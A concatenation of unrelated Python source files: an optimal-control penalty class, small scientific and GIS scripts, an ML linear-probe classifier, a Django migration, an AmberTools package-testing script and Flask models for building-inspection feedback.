self.node_idx = []
self.dt = 0
self.weight = weight
self.function: Union[Function, None] = None
self.function_non_threaded: Union[Function, None] = None
self.weighted_function: Union[Function, None] = None
self.weighted_function_non_threaded: Union[Function, None] = None
self.derivative = derivative
self.explicit_derivative = explicit_derivative
self.integrate = integrate
self.transition = False
self.multinode_constraint = False
self.phase_pre_idx = None
self.phase_post_idx = None
if self.derivative and self.explicit_derivative:
raise ValueError("derivative and explicit_derivative cannot be both True")
self.constraint_type = constraint_type
self.multi_thread = multi_thread
def set_penalty(self, penalty: Union[MX, SX], all_pn: PenaltyNodeList):
"""
Prepare the dimension and index of the penalty (including the target)
Parameters
----------
penalty: Union[MX, SX],
The actual penalty function
all_pn: PenaltyNodeList
The penalty node elements
"""
self.rows = self._set_dim_idx(self.rows, penalty.rows())
self.cols = self._set_dim_idx(self.cols, penalty.columns())
if self.target is not None:
self._check_target_dimensions(all_pn, len(all_pn.t))
if self.plot_target:
self._finish_add_target_to_plot(all_pn)
self._set_penalty_function(all_pn, penalty)
self._add_penalty_to_pool(all_pn)
def _set_dim_idx(self, dim: Union[list, tuple, range, np.ndarray], n_rows: int):
"""
Checks if the variable index is consistent with the requested variable.
Parameters
----------
dim: Union[list, tuple, range]
The dimension to set
n_rows: int
The expected row shape
Returns
-------
The formatted indices
"""
if dim is None:
dim = range(n_rows)
else:
if isinstance(dim, int):
dim = [dim]
if max(dim) > n_rows:
raise RuntimeError(f"{self.name} index cannot be higher than nx ({n_rows})")
dim = np.array(dim)
if not np.issubdtype(dim.dtype, np.integer):
raise RuntimeError(f"{self.name} index must be a list of integer")
return dim
def _check_target_dimensions(self, all_pn: PenaltyNodeList, n_time_expected: int):
"""
Checks if the variable index is consistent with the requested variable.
If the function returns, all is okay
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
n_time_expected: Union[list, tuple]
The expected shape (n_rows, ns) of the data to track
"""
if self.integration_rule == IntegralApproximation.RECTANGLE:
n_dim = len(self.target[0].shape)
if n_dim != 2 and n_dim != 3:
raise RuntimeError(
f"target cannot be a vector (it can be a matrix with time dimension equals to 1 though)"
)
if self.target[0].shape[-1] == 1:
self.target = np.repeat(self.target, n_time_expected, axis=-1)
shape = (
(len(self.rows), n_time_expected) if n_dim == 2 else (len(self.rows), len(self.cols), n_time_expected)
)
if self.target[0].shape != shape:
raise RuntimeError(
f"target {self.target[0].shape} does not correspond to expected size {shape} for penalty {self.name}"
)
# If the target is on controls and control is constant, there will be one value missing
if all_pn is not None:
if (
all_pn.nlp.control_type == ControlType.CONSTANT
and all_pn.nlp.ns in all_pn.t
and self.target[0].shape[-1] == all_pn.nlp.ns
):
if all_pn.t[-1] != all_pn.nlp.ns:
raise NotImplementedError("Modifying target for END not being last is not implemented yet")
self.target[0] = np.concatenate(
(self.target[0], np.nan * np.zeros((self.target[0].shape[0], 1))), axis=1
)
elif (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRAPEZOIDAL
):
target_dim = len(self.target)
if target_dim != 2:
raise RuntimeError(f"targets with trapezoidal integration rule need to get a list of two elements.")
for target in self.target:
n_dim = len(target.shape)
if n_dim != 2 and n_dim != 3:
raise RuntimeError(
f"target cannot be a vector (it can be a matrix with time dimension equals to 1 though)"
)
if target.shape[-1] == 1:
target = np.repeat(target, n_time_expected, axis=-1)
shape = (
(len(self.rows), n_time_expected - 1)
if n_dim == 2
else (len(self.rows), len(self.cols), n_time_expected - 1)
)
for target in self.target:
if target.shape != shape:
raise RuntimeError(
f"target {target.shape} does not correspond to expected size {shape} for penalty {self.name}"
)
# If the target is on controls and control is constant, there will be one value missing
if all_pn is not None:
if (
all_pn.nlp.control_type == ControlType.CONSTANT
and all_pn.nlp.ns in all_pn.t
and self.target[0].shape[-1] == all_pn.nlp.ns - 1
and self.target[1].shape[-1] == all_pn.nlp.ns - 1
):
if all_pn.t[-1] != all_pn.nlp.ns:
raise NotImplementedError("Modifying target for END not being last is not implemented yet")
self.target = np.concatenate((self.target, np.nan * np.zeros((self.target.shape[0], 1))), axis=1)
def _set_penalty_function(self, all_pn: Union[PenaltyNodeList, list, tuple], fcn: Union[MX, SX]):
"""
Finalize the preparation of the penalty (setting function and weighted_function)
Parameters
----------
all_pn: PenaltyNodeList
The nodes
fcn: Union[MX, SX]
The value of the penalty function
"""
# Sanity checks
if self.transition and self.explicit_derivative:
raise ValueError("transition and explicit_derivative cannot be true simultaneously")
if self.transition and self.derivative:
raise ValueError("transition and derivative cannot be true simultaneously")
if self.derivative and self.explicit_derivative:
raise ValueError("derivative and explicit_derivative cannot be true simultaneously")
def get_u(nlp, u: Union[MX, SX], dt: Union[MX, SX]):
"""
Get the control at a given time
Parameters
----------
nlp: NonlinearProgram
The nonlinear program
u: Union[MX, SX]
The control matrix
dt: Union[MX, SX]
The time a which control should be computed
Returns
-------
The control at a given time
"""
if nlp.control_type == ControlType.CONSTANT:
return u
elif nlp.control_type == ControlType.LINEAR_CONTINUOUS:
return u[:, 0] + (u[:, 1] - u[:, 0]) * dt
else:
raise RuntimeError(f"{nlp.control_type} ControlType not implemented yet")
return u
if self.multinode_constraint or self.transition:
ocp = all_pn[0].ocp
nlp = all_pn[0].nlp
nlp_post = all_pn[1].nlp
name = self.name.replace("->", "_").replace(" ", "_").replace(",", "_")
states_pre = nlp.states.cx_end
states_post = nlp_post.states.cx
controls_pre = nlp.controls.cx_end
controls_post = nlp_post.controls.cx
state_cx = vertcat(states_pre, states_post)
control_cx = vertcat(controls_pre, controls_post)
else:
ocp = all_pn.ocp
nlp = all_pn.nlp
name = self.name
if self.integrate:
state_cx = horzcat(*([all_pn.nlp.states.cx] + all_pn.nlp.states.cx_intermediates_list))
control_cx = all_pn.nlp.controls.cx
else:
state_cx = all_pn.nlp.states.cx
control_cx = all_pn.nlp.controls.cx
if self.explicit_derivative:
if self.derivative:
raise RuntimeError("derivative and explicit_derivative cannot be simultaneously true")
state_cx = horzcat(state_cx, all_pn.nlp.states.cx_end)
control_cx = horzcat(control_cx, all_pn.nlp.controls.cx_end)
param_cx = nlp.cx(nlp.parameters.cx)
# Do not use nlp.add_casadi_func because all functions must be registered
sub_fcn = fcn[self.rows, self.cols]
self.function = biorbd.to_casadi_func(name, sub_fcn, state_cx, control_cx, param_cx, expand=self.expand)
self.function_non_threaded = self.function
if self.derivative:
state_cx = horzcat(all_pn.nlp.states.cx_end, all_pn.nlp.states.cx)
control_cx = horzcat(all_pn.nlp.controls.cx_end, all_pn.nlp.controls.cx)
self.function = biorbd.to_casadi_func(
f"{name}",
self.function(all_pn.nlp.states.cx_end, all_pn.nlp.controls.cx_end, param_cx)
- self.function(all_pn.nlp.states.cx, all_pn.nlp.controls.cx, param_cx),
state_cx,
control_cx,
param_cx,
)
dt_cx = nlp.cx.sym("dt", 1, 1)
is_trapezoidal = (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
)
target_shape = tuple(
[
len(self.rows),
len(self.cols) + 1 if is_trapezoidal else len(self.cols),
]
)
target_cx = nlp.cx.sym("target", target_shape)
weight_cx = nlp.cx.sym("weight", 1, 1)
exponent = 2 if self.quadratic and self.weight else 1
if is_trapezoidal:
# Hypothesis: the function is continuous on states
# it neglects the discontinuities at the beginning of the optimization
state_cx = (
horzcat(all_pn.nlp.states.cx, all_pn.nlp.states.cx_end)
if self.integration_rule == IntegralApproximation.TRAPEZOIDAL
else all_pn.nlp.states.cx
)
# to handle piecewise constant in controls we have to compute the value for the end of the interval
# which only relies on the value of the control at the beginning of the interval
control_cx = (
horzcat(all_pn.nlp.controls.cx)
if nlp.control_type == ControlType.CONSTANT
else horzcat(all_pn.nlp.controls.cx, all_pn.nlp.controls.cx_end)
)
control_cx_end = get_u(nlp, control_cx, dt_cx)
state_cx_end = (
all_pn.nlp.states.cx_end
if self.integration_rule == IntegralApproximation.TRAPEZOIDAL
else nlp.dynamics[0](x0=state_cx, p=control_cx_end, params=nlp.parameters.cx)["xf"]
)
self.modified_function = biorbd.to_casadi_func(
f"{name}",
(
(self.function(all_pn.nlp.states.cx, all_pn.nlp.controls.cx, param_cx) - target_cx[:, 0])
** exponent
+ (self.function(state_cx_end, control_cx_end, param_cx) - target_cx[:, 1]) ** exponent
)
/ 2,
state_cx,
control_cx,
param_cx,
target_cx,
dt_cx,
)
modified_fcn = self.modified_function(state_cx, control_cx, param_cx, target_cx, dt_cx)
else:
modified_fcn = (self.function(state_cx, control_cx, param_cx) - target_cx) ** exponent
modified_fcn = weight_cx * modified_fcn * dt_cx if self.weight else modified_fcn * dt_cx
# Do not use nlp.add_casadi_func because all of them must be registered
self.weighted_function = Function(
name, [state_cx, control_cx, param_cx, weight_cx, target_cx, dt_cx], [modified_fcn]
)
self.weighted_function_non_threaded = self.weighted_function
if ocp.n_threads > 1 and self.multi_thread and len(self.node_idx) > 1:
self.function = self.function.map(len(self.node_idx), "thread", ocp.n_threads)
self.weighted_function = self.weighted_function.map(len(self.node_idx), "thread", ocp.n_threads)
else:
self.multi_thread = False # Override the multi_threading, since only one node is optimized
if self.expand:
self.function = self.function.expand()
self.weighted_function = self.weighted_function.expand()
def add_target_to_plot(self, all_pn: PenaltyNodeList, combine_to: str):
"""
Interface to the plot so it can be properly added to the proper plot
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
combine_to: str
The name of the underlying plot to combine the tracking data to
"""
if self.target is None or combine_to is None:
return
self.target_plot_name = combine_to
# if the target is n x ns, we need to add a dimension (n x ns + 1) to make it compatible with the plot
if self.target[0].shape[1] == all_pn.nlp.ns:
self.target_to_plot = np.concatenate(
(self.target[0], np.nan * np.ndarray((self.target[0].shape[0], 1))), axis=1
)
else:
self.target_to_plot = self.target[0]
def _finish_add_target_to_plot(self, all_pn: PenaltyNodeList):
"""
Internal interface to add (after having check the target dimensions) the target to the plot if needed
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
"""
def plot_function(t, x, u, p):
if isinstance(t, (list, tuple)):
return self.target_to_plot[:, [self.node_idx.index(_t) for _t in t]]
else:
return self.target_to_plot[:, self.node_idx.index(t)]
if self.target_to_plot is not None:
if self.target_to_plot.shape[1] > 1:
plot_type = PlotType.STEP
else:
plot_type = PlotType.POINT
all_pn.ocp.add_plot(
self.target_plot_name,
plot_function,
color="tab:red",
plot_type=plot_type,
phase=all_pn.nlp.phase_idx,
axes_idx=Mapping(self.rows),
node_idx=self.node_idx,
)
def add_or_replace_to_penalty_pool(self, ocp, nlp):
"""
Doing some configuration on the penalty and add it to the list of penalty
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp
nlp: NonLinearProgram
A reference to the current phase of the ocp
"""
if not self.name:
if self.type.name == "CUSTOM":
self.name = self.custom_function.__name__
else:
self.name = self.type.name
penalty_type = self.type.get_type()
if self.node == Node.TRANSITION:
all_pn = []
# Make sure the penalty behave like a PhaseTransition, even though it may be an Objective or Constraint
self.node = Node.END
self.node_idx = [0]
self.transition = True
self.dt = 1
self.phase_pre_idx = nlp.phase_idx
self.phase_post_idx = (nlp.phase_idx + 1) % ocp.n_phases
if not self.states_mapping:
self.states_mapping = BiMapping(range(nlp.states.shape), range(nlp.states.shape))
all_pn.append(self._get_penalty_node_list(ocp, nlp))
all_pn[0].u = [nlp.U[-1]] # Make an exception to the fact that U is not available for the last node
nlp = ocp.nlp[(nlp.phase_idx + 1) % ocp.n_phases]
self.node = Node.START
all_pn.append(self._get_penalty_node_list(ocp, nlp))
self.node = Node.TRANSITION
penalty_type.validate_penalty_time_index(self, all_pn[0])
penalty_type.validate_penalty_time_index(self, all_pn[1])
self.clear_penalty(ocp, all_pn[0].nlp)
elif isinstance(self.node, tuple) and self.multinode_constraint:
all_pn = []
self.node_list = self.node
# Make sure the penalty behave like a MultinodeConstraint, even though it may be an Objective or Constraint
# self.transition = True
self.dt = 1
# self.phase_pre_idx
# self.phase_post_idx = (nlp.phase_idx + 1) % ocp.n_phases
if not self.states_mapping:
self.states_mapping = BiMapping(range(nlp.states.shape), range(nlp.states.shape))
self.node = self.node_list[0]
nlp = ocp.nlp[self.phase_first_idx]
all_pn.append(self._get_penalty_node_list(ocp, nlp))
if self.node == Node.END:
all_pn[0].u = [nlp.U[-1]]
# Make an exception to the fact that U is not available for the last node
self.node = self.node_list[1]
nlp = ocp.nlp[self.phase_second_idx]
all_pn.append(self._get_penalty_node_list(ocp, nlp))
if self.node == Node.END:
all_pn[1].u = [nlp.U[-1]]
# Make an exception to the fact that U is not available for the last node
# reset the node list
self.node = self.node_list
penalty_type.validate_penalty_time_index(self, all_pn[0])
penalty_type.validate_penalty_time_index(self, all_pn[1])
self.node_idx = [all_pn[0].t[0], all_pn[1].t[0]]
self.clear_penalty(ocp, all_pn[0].nlp)
else:
all_pn = self._get_penalty_node_list(ocp, nlp)
penalty_type.validate_penalty_time_index(self, all_pn)
self.clear_penalty(all_pn.ocp, all_pn.nlp)
self.dt = penalty_type.get_dt(all_pn.nlp)
self.node_idx = (
all_pn.t[:-1]
if (
self.integration_rule == IntegralApproximation.TRAPEZOIDAL
or self.integration_rule == IntegralApproximation.TRUE_TRAPEZOIDAL
)
and self.target is not None
else all_pn.t
)
penalty_function = self.type.value[0](self, all_pn, **self.params)
self.set_penalty(penalty_function, all_pn)
def _add_penalty_to_pool(self, all_pn: PenaltyNodeList):
"""
Return the penalty pool for the specified penalty (abstract)
Parameters
----------
all_pn: PenaltyNodeList
The penalty node elements
"""
raise RuntimeError("get_dt cannot be called from an abstract class")
def clear_penalty(self, ocp, nlp):
"""
Resets a penalty. A negative penalty index creates a new empty penalty (abstract)
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp
nlp: NonLinearProgram
A reference to the current phase of the ocp
"""
raise RuntimeError("_reset_penalty cannot be called from an abstract class")
def _get_penalty_node_list(self, ocp, nlp) -> PenaltyNodeList:
"""
Get the actual node (time, X and U) specified in the penalty
Parameters
----------
ocp: OptimalControlProgram
A reference to the ocp
nlp: NonLinearProgram
A reference to the current phase of the ocp
Returns
-------
The actual node (time, X and U) specified in the penalty
"""
if not isinstance(self.node, (list, tuple)):
self.node = (self.node,)
t = []
for node in self.node:
if isinstance(node, int):
if node < 0 or node > nlp.ns:
raise RuntimeError(f"Invalid node, {node} must be between 0 and {nlp.ns}")
t.append(node)
elif node == Node.START:
t.append(0)
elif node == Node.MID:
if nlp.ns % 2 == 1:
raise (ValueError("Number of shooting points must be even to use MID"))
t.append(nlp.ns // 2)
elif node == Node.INTERMEDIATES:
t.extend(list(i for i in range(1, nlp.ns - 1)))
elif node == Node.PENULTIMATE:
if nlp.ns < 2:
raise (ValueError("Number of shooting points must be greater than 1"))
t.append(nlp.ns - 1)
elif node == Node.END:
t.append(nlp.ns)
elif node == Node.ALL_SHOOTING:
t.extend(range(nlp.ns))
elif node == Node.ALL:
t.extend(range(nlp.ns + 1))
else:
raise RuntimeError(" is not a valid node")
x = [nlp.X[idx] for idx in t]
u = [nlp.U[idx] for idx in t if idx != nlp.ns]
return PenaltyNodeList(ocp, nlp, t, x, u, nlp.parameters.cx)
|
#! /usr/bin/env python
# -*- mode: python; coding: utf-8 -*
# Copyright (c) 2018 Radio Astronomy Software Group
# Licensed under the 2-clause BSD License
from __future__ import absolute_import, division, print_function
import argparse
import os.path as op
from pyuvdata import UVData
parser = argparse.ArgumentParser()
parser.add_argument('uvfits_read',
help='name of a uvfits file to read in')
parser.add_argument('uvfits_write',
help='name of a uvfits file to write out')
args = parser.parse_args()
uvfits_file_in = args.uvfits_read
if not op.isfile(uvfits_file_in):
raise IOError('There is no file named {}'.format(args.uvfits_file_in))
uvfits_file_out = args.uvfits_write
this_uv = UVData()
this_uv.read_uvfits(uvfits_file_in)
this_uv.write_uvfits(uvfits_file_out)
del(this_uv)
|
import torch
from torch.utils.data import DataLoader, Dataset
from tqdm import tqdm
class Simple_Trans(Dataset):
def __init__(self, data, transform=None):
# [reps, labels]
self.reps = data[0]
self.labels = data[1]
# print(self.reps.shape, self.labels.shape) # torch.Size([60000, 64]) torch.Size([60000])
def __len__(self):
return self.labels.shape[0]
def __getitem__(self, idx):
return self.reps[idx, :], self.labels[idx]
class linear_clf(object):
def __init__(self, net, classifier, optimizer, train_dataloader, test_dataloader, device = "cpu", batch_size=1024,
num_epochs = 10, disable_tqdm = False, writer=None, writer_tag = "", pair=False):
self.net = net
#self.net.eval()
self.classifier = classifier
self.optimizer = optimizer
self.writer = writer
self.tag = writer_tag
self.disable_tqdm = disable_tqdm
self.device = device
self.batch_size = batch_size
self.num_epochs = num_epochs
self.data_train = Simple_Trans(self.compute_representations(train_dataloader))
self.data_test = Simple_Trans(self.compute_representations(test_dataloader))
self.best_number = 0
self.train_linear_layer()
self.train_acc = self.compute_accuracy(DataLoader(self.data_train, batch_size=batch_size))
self.test_acc = self.compute_accuracy(DataLoader(self.data_test, batch_size=batch_size))
#self.net.train()
def compute_representations(self, dataloader):
""" store the representations
:param net: ResNet or smth
:param dataloader: train_loader and test_loader
"""
#self.net.eval()
reps, labels = [], []
for i, (x, label) in enumerate(dataloader):
# load data
x = x.to(self.device)
labels.append(label)
# forward
with torch.no_grad():
representation = self.net(x)
reps.append(representation.detach().cpu())
if i % 100 == 0:
reps = [torch.cat(reps, dim=0)]
labels = [torch.cat(labels, dim=0)]
reps = torch.cat(reps, dim=0)
labels = torch.cat(labels, dim=0)
#self.net.train()
return [reps, labels]
def compute_accuracy(self, dataloader):
#self.net.eval()
self.classifier.eval()
right = []
total = []
for x, label in dataloader:
x, label = x.to(self.device), label.to(self.device)
# feed to network and classifier
with torch.no_grad():
pred_logits = self.classifier(x)
# compute accuracy
_, pred_class = torch.max(pred_logits, 1)
right.append((pred_class == label).sum().item())
total.append(label.size(0))
self.classifier.train()
#self.net.train()
return sum(right) / sum(total)
def train_linear_layer(self):
#self.net.eval()
class_criterion = torch.nn.CrossEntropyLoss()
progress_bar = tqdm(range(self.num_epochs), disable=self.disable_tqdm, position=0, leave=True)
for epoch in progress_bar:
for x, label in DataLoader(self.data_train, batch_size=self.batch_size):
self.classifier.train()
x, label = x.to(self.device), label.to(self.device)
pred_class = self.classifier(x)
loss = class_criterion(pred_class, label)
# backward
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
curr_number = self.compute_accuracy(DataLoader(self.data_test, batch_size=self.batch_size))
if curr_number >= self.best_number:
self.best_number = curr_number
if self.writer is not None:
self.writer.log_metrics({'CLFtraining/val-tag{}'.format(self.tag): curr_number}, step = epoch)
progress_bar.set_description('Linear_CLF Epoch: [{}/{}] Acc@1:{:.3f}% BestAcc@1:{:.3f}%'
.format(epoch, self.num_epochs, curr_number, self.best_number))
#self.net.train()
|
# Import libraries
from arcgis import gis
import logging
import json
#carole was here again
#Kerry test
secrets = r"H:\secrets\maphub_config.json"
# this is one method to
def readConfig(configFile):
# returns list of parameters
# with key 'name'
"""
reads the config file to dictionary
"""
logging.debug("Loading config")
with open(configFile) as json_file:
try:
d = json.load(json_file)
except:
print ("failed to parse configuration")
else:
return d
logging.debug("Config Loaded")
sites = readConfig(secrets)
for site in sites:
if site['name'].lower() == 'bc maphub':
params = site['params']
mh = gis.GIS(params['mapurl'],params['usr'],params['password'])
contents = mh.content.search(query="owner:{}".format(params['usr']))
for item in contents:
print (f"Name:{item['name']} Id: {item['id']}")
|
from datetime import datetime
from datetime import date
date_format = "%m/%d/%Y"
def comparedate(start,end,now):
a = datetime.strptime(start, date_format)
b = datetime.strptime(now, date_format)
c = datetime.strptime(end, date_format)
delta1 = b - a
delta2 = c - b
delta3 = a - a
days=c-a
print(days)
fare=int(str(days).split(" ")[0])*50
print(fare)
'''if delta1.days >= delta3.days and delta2.days >= delta3.days:
return True
else:
return False
'''
now=date.today().strftime(date_format)
start='9/1/2019'
end='12/1/2019'
comparedate(start,end,now)
'''if comparedate(start,end,now):
print("IT WORKS")
else:
print("OOPS...")'''
|
from factory import vectorizer_factory
from sklearn.base import TransformerMixin
from sklearn.pipeline import make_pipeline
from lime.lime_text import LimeTextExplainer
class VectorTransformer(TransformerMixin):
def __init__(self, vectorizer_name):
self.vectorizer_name = vectorizer_name
def fit(self,X, y=None):
pass
def transform(self, sentence_list, y=None):
return vectorizer_factory.get_vectorized_text(sentence_list,self.vectorizer_name)
def get_pipeline_for_classification(feature_transformer, trained_model):
return make_pipeline(feature_transformer, trained_model)
def get_explanation_for_instance(text_string,classifier_function, class_list, max_num_features_to_show=10, file_to_save='explain.html'):
explainer = LimeTextExplainer(class_names=class_list,random_state=42)
explained_instance = explainer.explain_instance(text_string, classifier_function.predict_proba,
num_features=max_num_features_to_show, top_labels=len(class_list))
explained_instance.save_to_file(file_to_save)
return explained_instance.as_list()
|
from fsapi import FSAPI
URL = 'http://192.168.1.39:80/device'
PIN = 1234
TIMEOUT = 1 # in seconds
fs = FSAPI(URL, PIN, TIMEOUT)
print('Name: %s' % fs.friendly_name)
print('Mute: %s' % fs.mute)
print('Mode: %s' % fs.mode)
print('Modes: %s' % fs.modes)
print('Power: %s' % fs.power)
print('Volume steps: %s' % fs.volume_steps)
print('Volume: %s' % fs.volume)
print('Play status: %s' % fs.play_status)
print('Track name: %s' % fs.play_info_name)
print('Track text: %s' % fs.play_info_text)
print('Artist: %s' % fs.play_info_artist)
print('Album: %s' % fs.play_info_album)
print('Graphics: %s' % fs.play_info_graphics)
|
# Generated by Django 2.2.16 on 2020-10-27 09:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('organizations', '0017_add_organizationaltname'),
('scheduler', '0003_harvest'),
]
operations = [
migrations.CreateModel(
name='Automatic',
fields=[
(
'id',
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name='ID'
),
),
('month', models.DateField()),
(
'harvest',
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE, to='scheduler.Harvest'
),
),
(
'organization',
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='automatic_harvest',
to='organizations.Organization',
),
),
],
),
migrations.AddConstraint(
model_name='automatic',
constraint=models.CheckConstraint(check=models.Q(month__day=1), name='fist_month_day'),
),
migrations.AddConstraint(
model_name='automatic',
constraint=models.UniqueConstraint(
fields=('month', 'organization'), name='unique_month_organization'
),
),
]
|
import os
import sys
import subprocess
from contextlib import contextmanager
import argparse
import glob
ENV_ROOT = 'test_ambertools'
AMBER_VERSION = 'amber17'
def is_conda_package(package_dir):
basename = os.path.basename(package_dir)
return not (basename.startswith('osx') or basename.startswith('linux'))
def run_test(package_dir, amberhome, TEST_SCRIPT):
if is_conda_package(package_dir):
subprocess.check_call('bash {}'.format(TEST_SCRIPT), shell=True)
else:
subprocess.check_call(
"source {}/amber.sh && bash {}".format(amberhome, TEST_SCRIPT),
shell=True)
def install_ambertools(package_dir,
env_name,
tmp_dir='junk_folder',
pyver='2.7'):
if is_conda_package(package_dir):
# conda
subprocess.check_call(
'conda install {} -n {}'.format(package_dir, env_name), shell=True)
else:
amberhome = os.path.abspath(os.path.join(tmp_dir, AMBER_VERSION))
# non-conda
try:
os.mkdir(tmp_dir)
except OSError:
pass
os.chdir(tmp_dir)
if os.path.exists(AMBER_VERSION):
print("Existing {}. Skip untar".format(AMBER_VERSION))
else:
subprocess.check_call(['tar', '-xf', package_dir])
# os.environ['AMBERHOME'] = amberhome
# os.environ['PYTHONPATH'] = os.path.join(amberhome,
# 'lib/python{}/site-packages'.format(pyver))
# os.environ['PATH'] = os.path.join(amberhome, 'bin') + ':' + os.getenv("PATH")
def find_miniconda_root():
command = "conda info --base"
return subprocess.check_output(command, shell=True).decode().strip()
def create_env(env, python_version):
sys.stdout.write('creating {} env'.format(env))
cmlist = 'conda create -n {} python={} numpy nomkl --yes'.format(
env, python_version)
print(cmlist)
subprocess.check_call(cmlist.split())
@contextmanager
def run_env(env_name, python_version):
os.environ['PYTHONPATH'] = ''
ORIG_PATH = os.environ['PATH']
env_path = find_miniconda_root() + '/envs/' + env_name
env_bin_dir = env_path + '/bin/'
os.environ['CONDA_PREFIX'] = env_path
os.environ['PATH'] = env_bin_dir + ':' + ORIG_PATH
if not os.path.exists(find_miniconda_root() + '/envs/' + env_name):
create_env(env_name, python_version)
os.system('source activate {}'.format(env_name))
yield
os.system('conda env remove -n {} -y'.format(env_name))
os.environ['PATH'] = ORIG_PATH
def ensure_no_gfortran_local(amberhome):
errors = []
for fn in get_tested_files(amberhome):
cmd = ['otool', '-L', fn]
try:
output = subprocess.check_output(
cmd, stderr=subprocess.PIPE).decode()
except subprocess.CalledProcessError:
output = ''
if '/usr/local/gfortran' in output:
errors.append(fn)
return errors
def get_so_files(dest):
cmd = 'find {} -type f -name "*.so"'.format(dest)
print('cmd: {}'.format(cmd))
output = subprocess.check_output(cmd, shell=True)
output = output.decode()
files = [fn for fn in output.split('\n') if fn]
return files
def get_tested_files(dest):
so_files = get_so_files(dest)
# files_in_bin = [os.path.join(dest, 'bin', fn)
# for fn in ['cpptraj', 'sqm', 'mdgx']]
files_in_bin = glob.glob(os.path.join(dest, 'bin/*'))
return [
fn
for fn in so_files + files_in_bin + glob.glob(
os.path.join(dest, 'bin/to_be_dispatched/*')) + glob.glob(
os.path.join(dest, 'lib/*dylib'))
]
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument("package_dir")
parser.add_argument("-py", dest='pyvers')
opt = parser.parse_args(args)
package_dir = opt.package_dir
tmp_dir = 'junk_folder' # only exists if non-conda package
conda_recipe = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', 'conda-ambertools-single-python'))
TEST_SCRIPT = '{}/run_test.sh'.format(conda_recipe)
print('conda_recipe', conda_recipe)
print('run_test', run_test)
pyvers = [
opt.pyvers,
] if opt.pyvers else ['2.7', '3.4', '3.5', '3.6', '3.7']
print('Python versions = {}'.format(pyvers))
print('conda package = {}'.format(is_conda_package(package_dir)))
errors = []
for py in pyvers:
env_name = ENV_ROOT + py
with run_env(env_name, py):
if is_conda_package(package_dir):
amberhome = find_miniconda_root() + '/envs/' + env_name
else:
# do not set CONDA_PREFIX to trigger
# unset PYTHONPATH in run_test.sh in this case.
os.environ['CONDA_PREFIX'] = ''
amberhome = os.path.join(
os.path.abspath(tmp_dir), AMBER_VERSION)
install_ambertools(package_dir, env_name, pyver=py)
if sys.platform.startswith('darwin'):
errors = ensure_no_gfortran_local(amberhome)
run_test(package_dir, amberhome, TEST_SCRIPT)
# check libgfortran
if errors:
print(
"ERROR: Files should not have /usr/local/gfortran in its content"
)
print(errors)
sys.exit(1)
else:
print("libgfortran fixed. Wonderful")
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
import datetime as dt
from flask import json, render_template
from inspectors.database import (
Column,
db,
Model,
ReferenceCol,
relationship,
SurrogatePK,
)
REPR_DATE_FMT = "%Y/%m/%d"
class Supervisor(Model):
"""A person who supervises building inspectors"""
__tablename__ = 'supervisor'
id = Column(db.Integer, primary_key=True, index=True)
email = Column(db.String(80), index=True, nullable=False)
full_name = Column(db.String(150), nullable=False)
active = Column(db.Boolean, default=True)
inspectors = db.relationship('Inspector', backref='supervisor')
last_report = Column(db.DateTime, nullable=True)
def __repr__(self):
return '<Supervisor({0})>'.format(self.full_name)
def send_report(self):
raise NotImplementedError
def unsubscribe(self):
raise NotImplementedError
class Inspector(Model):
"""A person who does inspections."""
__tablename__ = 'inspector'
id = Column(db.Integer, primary_key=True, index=True)
inspector_key = Column(db.String(25), nullable=False, index=True)
first_name = Column(db.String(80), nullable=False)
last_name = Column(db.String(80), nullable=False)
photo_url = Column(db.String(80), nullable=True)
supervisor_id = Column(db.Integer, db.ForeignKey('supervisor.id'), nullable=False)
inspections = db.relationship('Inspection', backref='inspector')
@property
def full_name(self):
''' The format of the inspector name which
shows in all surveys. For now, keep it to
the first name (John) rather than the full
name (John Jones) or John J.
'''
return "{0}".format(self.first_name)
def __repr__(self):
return '<Inspector(id:{0}, name:{1})>'.format(self.inspector_key, " ".join([self.first_name, self.last_name]))
class Inspection(Model):
"""An inspection of a some construction by an inspector"""
__tablename__ = 'inspection'
id = Column(db.Integer, primary_key=True, index=True)
permit_number = Column(db.String(25), nullable=False)
date_inspected = Column(db.DateTime, nullable=False)
permit_type = Column(db.String(10), nullable=False)
permit_description = Column(db.String(50), nullable=True)
display_description = Column(db.String(50), nullable=False)
job_site_address = Column(db.String(200), nullable=False)
inspector_id = Column(db.Integer, db.ForeignKey('inspector.id'), nullable=False)
users_feedback = db.relationship('Feedback', backref='inspection')
@property
def permit_type_full(self):
return {
'BLDG': 'Building',
'ROOF': 'Roofing',
'ELEC': 'Electrical',
'PLUM': 'Plumbing',
'MECH': 'Mechanical',
'ZONE': 'Zoning'
}.get(self.permit_type, self.permit_type)
def generate_tf_id(self):
''' Generate the Typeform URL of the personalized
form - necessary for the inspection_feedback table
'''
from inspectors.surveys.typeform import TypeformIOClass
tf = TypeformIOClass()
inspector = Inspector.query.get(self.inspector_id).full_name
str_quiz = render_template(
'typeform/template.json',
inspector=inspector,
permit_number=self.permit_number,
itype=self.permit_type_full,
description=self.permit_description,
result=self.display_description,
addr=self.job_site_address)
json_quiz = json.loads(str_quiz)
result = tf.make_call(json_quiz)
return result['id']
@property
def tf_url(self):
return 'https://forms.typeform.io/to/' + self.generate_tf_id()
def is_cancelled(self):
return self.display_description in ('CANCELLATION BY INTERNET', 'INSPECTION CANCELLATION')
def is_passed(self):
return self.display_description in ('APPROVED')
def __repr__(self):
return '<Inspection({0}:{1})>'.format(self.permit_number, self.date_inspected.strftime(REPR_DATE_FMT))
class Feedback(Model):
"""A many to many relation table between inspections and users that records
whether or not we've already asked a user for feedback on one particular
inspection.
"""
__tablename__ = 'feedback'
